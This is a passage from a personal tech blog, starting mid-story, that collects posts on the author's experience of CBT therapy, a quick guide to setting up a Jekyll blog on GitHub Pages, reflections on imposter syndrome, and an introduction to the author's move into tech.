The medical professional just happened to be a mental health therapist, taking time away from therapy (They take time off as it can be quite taxing to be a therapist), and I was immediately assessed.
It's kinda lucky, as I would have backed out if I'd had the chance. Being immediately assessed, I couldn't, and a week later I was in front of my therapist. Cognitive-behavioural therapy (CBT) was the chosen therapy.
What was involved?
Quick version: you don't get treated. You get taught to address thoughts in a different manner, and are helped to treat yourself.
Longer Version: CBT, or cognitive-behavioral therapy, is a type of talk therapy that is used to treat a variety of mental health conditions, including depression, anxiety, and PTSD.
CBT is based on the idea that our thoughts, feelings, and behaviors are interconnected, and that by changing our thoughts and behaviors, we can change the way we feel.
CBT is typically conducted in a one-on-one session with a licensed therapist. During a CBT session, the therapist and client work together to identify negative thought patterns and behaviors that may be contributing to the client's mental health concerns. The therapist then teaches the client strategies to challenge and reframe negative thoughts, and to replace unhelpful behaviors with more positive ones.
For example, if someone with social anxiety is afraid to attend social events because they believe they will be judged by others, the therapist might use CBT to help them challenge this belief by asking them to think about times when they have attended social events and had positive experiences. The therapist might also teach the client relaxation techniques or social skills to help them feel more confident in social situations.
CBT typically involves weekly sessions for several months, although the length and frequency of therapy can vary depending on the individual's needs. CBT has been shown to be an effective treatment for a variety of mental health conditions, and it can be used in combination with medication or other treatments for optimal results.
So, I am going to pass on some of the tools given to me. Like many things, there are many tools in the therapy box of tricks, and what works for you may not work for someone else. You may need a butter knife to undo your screw, I'll use a chisel, and others may need the flathead screwdriver.
A term also used is talking therapy, and this is where it starts: talking.
NOW, I had always been very cynical of therapy, but you end up speaking to someone who is invested in you, and it's surprisingly easy to talk.
So why is this different from talking to a pal?
If you talk to a pal/partner, they care deeply, and they wish to help, they want to fix the issue. Your therapist doesn't, they want to give you the tools to fix it.
“Give a man a fish and you feed him for a day; teach a man to fish and you feed him for a lifetime.”
Workpal example:
- You: “Bob, how do you do so and so?”
- Bob: “Here y'are, mate, give it here, I'll do it.”
Problem solved – it is done with care and compassion, but you are not any further forward.
With CBT, tools are offered to help you and here are a couple that helped me.
One is chatting and having no direct feedback. The received theme from my point of view was that my emotions were questioned and where needed, challenged or affirmed.
To give an example, let's try questioning your job abilities.
Chatting: I may express the thought that I'm not good enough to do my role.
This isn't affirmed, nor is it challenged. Instead it creates a number of questions: why do you feel this way, what qualifies you for the role, how did you get the role, what have you done that is good, what have you seen go wrong, pros vs cons.
Another tool is the perception report.
This asks you to record a feeling or emotion, measure your feelings at this time, thoughts or feelings around this and then a number of differing perceptions. Here is what an entry would look like.
- Feeling: My partner didn't say they loved me when I ended our phone call.
- Emotion and measure: sad 60%, angry 70%, questioning 20%.
- Thoughts or feelings: I always say I love them – is that not important to them? Why don't they care? Are my emotions not important to them? They have been distant – have they found someone else?
- Perceptions: this is built around a set of asks:
  - What would a person who cared for themself think or say?
  - When you are 80, will it matter?
  - What three good things could come from this?
  - What would a close friend say…?
Your answers could be:
- Will this matter when you're 80? Well, they say it most times, so in the scheme of things, prob not.
- What good could come of it? It's a sign that it is no longer just a habit but said when meant – it will mean more when it is said.
There are a lot of other perceptions and these can be considered with your therapist, this allows you to explore the answers and push the questions more but, it is a helpful thing to do with or without a therapist.
Is it intrusive? You could fill this in at the time each thing occurs but, ultimately, you could do it twice a day, e.g. dinner and bedtime, or even just like a diary, once a day… “But I might miss some bits,” I hear you say.
Well, if you don't remember it at night-time, does it really matter? One other benefit: I always seemed to have a busy mind and my sleeping pattern was awful. Writing your day down – plans for tomorrow, worries – allows you to clear your mind and sleep better.
If you then assess the list yourself once a week, you can see what really matters, you may see that with a change in perspective, actually, all the negativity can be changed to positive.
Let's take a look.
Your partner didn't phone on a night out.
Let's go negative :(
They are having intimate time with another person; they don't care about me and have forgotten me; they are drunk and vulnerable.
Let's now switch:
They are having fun and you should be happy for them. They love you so much they don't need to be attached at the hip, and they will love you more.
Just this switch can change so many things. Repetition is the key to challenging the auto response you have to a scenario.
Just revisiting a note from earlier regarding my going to uni and my wife's distance, or perceived non-interest. One thing my therapy taught me was it's not all about you :D. Think why; think about others' thoughts and how this can affect them, and then you. To place myself in my wife's shoes (she has smaller feet so it's difficult :D): the husband who has for so long been on a linear path – steady, you know what's happening from one week to the next. All this has changed. He has a new set of friends, all young; he is looked up to; he is going out more; he is changing. How scary must that be for her?
Final Bit
Only you have control of you. Small changes you make can make huge changes to your life.
My last bits of advice:
- Therapy will hurt and bring up things you have buried or dont want to cover
- don't make it secret.
Ouch
I don't want to cover all my things, but we all have baggage. You will cover this: you will pick up the box, open it, look inside, and repackage the goods in a better way. To make an example, imagine the box is childhood. Your perception would be from a child's POV. Now you're an adult.
You will have a very different perception now, you can re-assess.
You will be given the chance to talk it over, work it through, and make peace with the box.
You will also find better ways to deal with life in general.
Inform
Your therapy should not be a secret. OK, you don't need to be that person telling everybody like they have a special badge – no one really cares – but let your partner know what's going on.
Imagine: every night you walk into the kitchen and ask your partner if they need help making dinner.
They reply no thanks.
You respond with slight hurt that you'd like to help but they just advise that they want to do it on their own…
you sulk away in a huff.
Now, after some therapy, you've realised that this dinner-making time is “their” wind-down time, and letting them unwind is good.
So, now you change and you ensure that they know you'd like to get involved and you love them and they only need to ask and you'll be there.
If you don't make them aware, these changes could be a huge shock to a partner who didn't know you were having therapy.
Like many things, you get out what you put in.
Keep safe, look after yourself and remember, if you had a bad back, you would go to the doctor. Well a bad mental state is no different.
Create your own blog
GitHub and AWS R53!
Want to have a bash at creating a blog?
Well, this isn't the first time I've thought about creating a blog.
I had previously looked at using Hugo. This worked well, and I wrote a few bits but never published them. I just never continued and have since thought about it a number of times.
So this time, as I'd forgotten what I'd used last time, I was looking for a static page blog creator. WordPress came up as an option (yeah, slap me). I decided to use AWS and here I started looking at setting up an EC2, R53, EIP, RDS, etc. I wanted to be a smarty‑pants so, stupidly, started writing the Terraform to do this. Advice: that is dumb when you are working out how something is made. Create a POC (proof of concept), get that all working and then start writing Terraform.
Whilst looking at an error and creating the repository on GitHub, I came across Jekyll. Another learning point: resist the overwhelming desire to keep following a path just because you started down it. Get out of being precious – you're not always right first time.
So I swallowed my pride and started to look at Jekyll. It was so easy: download, execute, and test. Add to that I found that there are loads of themes you can find and these were just as easy – download and you're more or less done.
Simples
So this isn't an in‑depth guide but a great starter.
The Jekyll website has great walkthroughs so I would be doing them an injustice by trying to recreate that, but I will give you the VERY quick and easy way.
Prerequisite: a GitHub account.
- Hit the Jekyll Themes website.
- Select any theme you fancy.
- Go to GitHub and create a repository called name.github.io (GitHub walkthrough).
- Push the code up to the repo, or upload the code manually.
- Now your website should be up and running.
Well that was easy, wasn't it.
Now, how do we edit this? If you open the _posts folder in the code you will see a bunch of test blogs.
The convention is date then name, e.g. 2023-04-21-name-of-file.markdown.
You will see that the start/head of the file will contain:
```yaml
---
title: "The Title Which Is Shown On The Main Page"
subtitle: "Sub Title to Title Headline"
author: "You I Guess :D"
avatar: "img/authors/you.jpg"
image: "img/blogimage.png" # Image shown on the blog icon
date: 1999-01-01 # Date shown on the page
tags: website R53 github webpage gitpage # Some tags \O/
---
```
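Before pushing, you can preview the site locally. A minimal sketch, assuming you have Ruby installed and your chosen theme ships a Gemfile (most do):

```shell
# One-off: install Jekyll and Bundler
gem install bundler jekyll

# From the root of your repo/theme:
bundle install            # pull in the theme's gems from its Gemfile
bundle exec jekyll serve  # build and serve at http://localhost:4000
```

Edit a post in _posts, and jekyll serve will rebuild on save, so you can sanity-check the front matter and layout before it ever hits GitHub.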
Imposter Syndrome – Really
Is it just me – no!
Imposter Syndrome – really, I'm sick of hearing about it.
Yeah, everybody has jumped on this bandwagon. Everyone is soooo vulnerable and precious.
Well, not everybody is. I've met a few characters in tech. My original exposure was to a lot of people who were helpful, genuine, and a real team. This is me looking back to see the bigger picture.
As time has gone on, I've met some that really are just imposters. They plough through life by ignoring that they're wrong, bullying, not listening to others, and making the same mistakes again and again. That approach makes you very good at looking the part, and at moving on before you are found out. That is not imposter syndrome; it is a very different thing.
In my original exposure to the tech scene, all people were unique but understood that you can't know everything. The first time people I saw as geniuses asked for my help was when I shit myself. That was one of the moments when I felt like an imposter.
When did I see it for the first time?
I had never heard the term “imposter syndrome” until one day a friend at university said they felt I was a big sufferer.
What is the syndrome?
Try this link: Very Well Mind – Imposter Syndrome
or
try this: Mike Cannon-Brookes, an ultra‑successful guy, who lets you in on how being clever or successful can knock you.
I'd worked and been successful before university. I was older than everyone in my cohort. This really adds pressure. I couldn't fail; it was so important that I didn't get it wrong.
I was lucky that I met some very clever people. I felt out of my depth (as you should at university). I thought that these people were carrying me. They said I was helping them and excelling in some areas. This was very hard for me to believe: surely I was lucky (lucky, fluked, liked ← all terms you use to dismiss that you're actually very good and/or learning a lot) and that part was an easy bit that I knew, or I had done something similar. There are so many reasons you can get in your head to dismiss success.
I got my job, I did well, and I still excel in this role. This isn't how I felt, though.
I have, after a number of years, learnt to get a grip on this runaway self‑sabotage.
But look at those people who are super confident
Have you seen that person who tells everybody how good they are? They really believe it. At first, you may believe them, but then you see that they are not quite as good as they think!! This is the Dunning–Kruger effect. Put simply, you may have heard that term “a little knowledge can be dangerous”. Well, here it is: they are blown away by their knowledge and think they are creating magic. Well, I won't knock that, as I too have been amazed by what can be done, BUT this is where we diverge. I see how far I've come, but I also see how much I don't know.
The other person just doesn't see the upcoming learning curve. As a now‑experienced techie, I see these newbies come in, and I like that excitement, and I would always encourage these people to keep learning.
This is also where I explain my struggles with imposter syndrome. They are generally knocked sideways because they see me as a goal (I'm looking at what they are achieving and thinking “wow”, too).
That is exactly what I want to explain. Nice, clever, genuine, honest people know what they know; they also appreciate the effort and work that goes into learning and will always appreciate those around them. They know where they are going and where they have been. They are open and caring to those coming up behind them to join the tech team. That can also expose them to imposter syndrome as they are held up high.
Eventually they get comfortable knowing that the journey of learning will never end (just as you think “I've got this”, you find something that slaps you around the chops and makes you humble again). They do get comfortable with what they know, as subject‑matter experts, and with knowing that they can't know EVERYTHING, and they get happy with saying, “I don't know”. They are also happy to realise, as my ex‑boss told me, that you ain't employed because you know it all, but because of your ability to – and that there is a lot more to you than just what you know.
Did you get the job because you are a genius or because you are nice? Probably both. If you knew nothing, you wouldn't be where you are, but if you know a lot and people can work with you, that's better than a genius who is arrogant, can't hold a conversation, etc.
Now, I am never going to tell you how to control your self‑doubt, how it happens, or what to do for you, but I can share about me, and maybe that can help. Mostly, remember that you're not alone. Honestly, unless it has gone to their head and they've become arrogant (again, is that a manner to protect themselves from being found out in their minds?), all those people have doubts too. They may have worked through it and become comfortable with it, but they all suffer.
So
Well, my point is that imposter syndrome is nothing special; it doesn't make you different; it actually makes you just like everybody else. Do you breathe? Well, so does everybody else.
We now have a name for a natural thing; it is what drives you on, makes you humble, and makes you a nicer person.
None of this is to dismiss the feeling – it is real – just know, if there is someone you can share this with, do it. If there isn't, know that almost everyone is feeling the same.
Will you get over it?
Maybe, but most probably you'll just get used to feeling this way.
You'll have times when you are on fire, feel you've learnt loads, then have days when you think, “I have no idea what I'm doing.”
On those low days, look back and see all the amazing things you've done. Take a moment, have a short break, and then come back to your issue.
I've just watched Lewis Capaldi on Netflix – even he suffers.
Look after yourself, work to live; balance is the key.
Here are a few links to some resources:
Blogs are the new social!
It's all cyclic!
So, what's all this about?
Well, I have entered the tech scene, and there are so many blogs I hit on a daily basis with those hidden nuggets of knowledge.
So why a blog?
As I go about my day, I have a lot of those moments where I find something that I think others may find interesting or that might get them out of a bind.
There are times when a good rant is all I need, so here we are.
Then I think others might be interested in another person's journey in tech, self‑concerns, etc.
Who am I
Entered the tech scene!!! Oh, I hear you say, another halfwit thinking they can jump on the tech bandwagon.
Well, it's not quite like that. For many years I'd had an interest in tech: lots of playing over the years, hacking websites, playing and hacking games, fixing stuff (breaking stuff), building stuff.
I've played with Windows and Linux, plus anything else I could get into. I've worked in the manufacturing scene for a long time, linked a lot of otherwise-incompatible systems together, and dropped all the way back to using Win3.1 for printing – macros in MS Office, UNIX, C#, lots of weird and wonderful tech bits.
So, opportunity knocked and I decided to go to uni and take a BSc in CompSci and Cyber Sec.
Now, I'm really in the tech scene. I work for a real tech company.
That's it. I know past stuff that I'm trying to fit into my new existence, I know new stuff that I'm seeing if it is useful, and the stuff I'm learning is the new horizon.
It's daunting, exciting, and so often I wonder, can I do this… Obviously, yeah – and I'd like to share all this with you. :D
So here we are, a new outlet for me to share with anyone who is interested (or, no doubt, talk to myself).
It will contain:
- bits of my week
- bits I've learnt
- vents about tech and goings‑on
- feelings
- weirdness
- more or less anything kinda tech‑related (or even not)
As always, the line – these opinions are all my own; they in no way constitute any link to the company I work for.
Now the dull bit is over, let me get to work on writing a blog.
So, should it be:
- SVB (Silicon Valley Bank)
- LTT – he's better looking with a beard for one, but is he a tech person's guilty pleasure to watch or a real tech god? Let's be honest, he needs to just get a grip of Linux.
- How WFH is good or bad
- Back‑stabbers
- What a tech role is and the wide range
- Women in tech and how to fix it
- Are we sick of hearing about ChatGPT – will it really put us out of work?
So many things, so short on time.
Some, dare we cover? :/
Be nice and make someone smile today.